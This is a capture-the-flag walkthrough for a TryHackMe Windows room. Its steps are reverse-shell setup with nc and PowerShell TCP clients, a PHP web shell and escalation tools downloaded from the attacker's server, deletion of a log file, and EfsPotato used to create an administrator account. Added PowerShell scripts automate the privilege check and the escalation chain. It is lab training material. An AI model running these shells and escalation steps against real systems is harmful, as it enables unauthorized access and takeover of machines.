Stealth

Room Link: https://tryhackme.com/r/room/stealth

Scans

Initial scan

Kali

nmap -A $VICTIM

Longer scan

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/8000 - HTTP (plain HTTP; the decoded flag link below is fetched over http://...:8000)

TCP/8080 - HTTPS

Initial Shell

Kali

rlwrap nc -lvnp 4444

Shell #1 attempt

This shell didn't work

Kali

git clone https://github.com/samratashok/nishang.git
cd nishang/Shells/
subl Invoke-PowerShellTcp.ps1

Kali(subl)

Invoke-PowerShellTcp -Reverse -IPAddress $KALI -Port 4444

Shell #2 attempt

This shell worked

Kali

git clone https://github.com/martinsohn/PowerShell-reverse-shell.git
cd PowerShell-reverse-shell/
subl powershell-reverse-shell.ps1

Change this line to the Kali IP

Kali(subl)

Net.Sockets.TCPClient('$KALI', 4444)

Victim

cd C:\Users\evader\Desktop
dir
type encodedflag

Kali

echo WW91IGNhbiBnZXQgdGhlIGZsYWcgYnkgdmlzaXRpbmcgdGhlIGxpbmsgaHR0cDovLzxJUF9PRl9USElTX1BDPjo4MDAwL2FzZGFzZGFkYXNkamFramRuc2Rmc2Rmcy5waHA= | base64 --decode

Victim

cd C:\xampp\htdocs\uploads
del log.txt

Refresh the page and the flag is now shown.

Lateral Movement

Going by `whoami /priv` this shell has very few privileges, but since we can write to the web root, I tried dropping a PHP web shell to see whether the web server's process context gives us anything more.

Victim

whoami /priv

Kali

git clone https://github.com/flozz/p0wny-shell.git
cd p0wny-shell/ 
python2 -m SimpleHTTPServer 82

Victim

cd C:\xampp\htdocs
iwr -uri "http://$KALI:82/shell.php" -o shell.php

Even though `whoami` reports the same user, the web shell runs inside the XAMPP Apache process, and that process has SeImpersonatePrivilege enabled, which the PowerShell reverse shell does not.
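To compare the two contexts quickly rather than reading `whoami /priv` by eye, the following added example (not from the page) parses the privilege table and reports whether one of the privileges that Potato-style tools (PrintSpoofer, EfsPotato) need is enabled. Run it from the PowerShell reverse shell and again from the p0wny web shell (for example `powershell -ep bypass -f check.ps1`); only the second should report an impersonation privilege.

```powershell
# Added example: parse `whoami /priv` into objects and flag the privileges
# that token-impersonation escalation needs. Not part of the original page.
function Get-ImpersonationPrivileges {
    $result = @()
    foreach ($line in (whoami /priv)) {
        # Rows look like: "SeImpersonatePrivilege  Impersonate a client after authentication  Enabled"
        if ($line -match '^(Se\w+Privilege)\s+.*\s+(Enabled|Disabled)\s*$') {
            $result += [pscustomobject]@{ Name = $matches[1]; State = $matches[2] }
        }
    }
    return $result
}

$privs = Get-ImpersonationPrivileges
$privs | Format-Table -AutoSize

# Either of these, when Enabled, is enough for PrintSpoofer/EfsPotato-style escalation
$needed = 'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege'
$potato = $privs | Where-Object { $_.Name -in $needed -and $_.State -eq 'Enabled' }

if ($potato) {
    "Potato-style escalation possible here: $($potato.Name -join ', ')"
} else {
    "No impersonation privilege in this context; try another process (e.g. the web server's)"
}
```

The point of running it twice is that privileges belong to the process token, not to the account name: the same user can have different privileges depending on which service spawned the shell.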

Privilege Escalation

I tried PrintSpoofer first, but the exe would not execute.

Attempt #1

Kali

git clone https://github.com/dievus/printspoofer
cd printspoofer/
python2 -m SimpleHTTPServer 82

Victim

cd C:\Users\evader\Desktop
iwr -uri "http://$KALI:82/PrintSpoofer.exe" -o PrintSpoofer.exe
PrintSpoofer.exe -i -c whoami

Attempt #2

We can see an EFI folder, which looks like a clue on what to do.

Victim

cd C:\
dir

Kali

git clone https://github.com/zcgonvh/EfsPotato.git
cd EfsPotato/
python2 -m SimpleHTTPServer 82

Victim

iwr -uri "http://$KALI:82/EfsPotato.cs" -o efs.cs

Victim(p0wny-shell)

C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe efs.cs -nowarn:1691,618
efs.exe "cmd.exe /c net user user password@123 /add && net localgroup administrators user /add"

Kali

remmina
Username: user
Password: password@123
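The compile, run and RDP steps above can be chained and checked in one script. The following is an added example, not from the page or the EfsPotato project: it assumes efs.cs is already in the current directory (downloaded as shown above), that the script runs in the web shell's SeImpersonatePrivilege context (for example `powershell -ep bypass -f escalate.ps1` from p0wny-shell), and it uses the same account name and password as on the page.

```powershell
# Added example: compile EfsPotato, run it with the add-admin command from the
# page, and confirm the new account landed in the local Administrators group.
$csc = 'C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe'
if (-not (Test-Path $csc)) { throw "csc.exe not found at $csc" }

# Same compile line as the page; efs.cs produces efs.exe by default
& $csc efs.cs -nowarn:1691,618
if ($LASTEXITCODE -ne 0 -or -not (Test-Path .\efs.exe)) { throw 'compile failed' }

$user = 'user'            # account name used on this page
$pass = 'password@123'    # password used on this page
& .\efs.exe "cmd.exe /c net user $user $pass /add && net localgroup administrators $user /add"

# Verify: member names are printed one per line by `net localgroup`
$admins = net localgroup administrators
if ($admins -match "^$user\s*$") {
    "$user is now a local administrator; connect over RDP (remmina) with those credentials"
} else {
    "escalation did not take effect; confirm this shell has SeImpersonatePrivilege enabled"
}
```

Checking `net localgroup administrators` afterwards matters because EfsPotato prints its own status but the spawned `cmd.exe` can still fail silently, for example if the password does not meet the local policy, in which case the `net user` step creates nothing and the RDP login fails.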
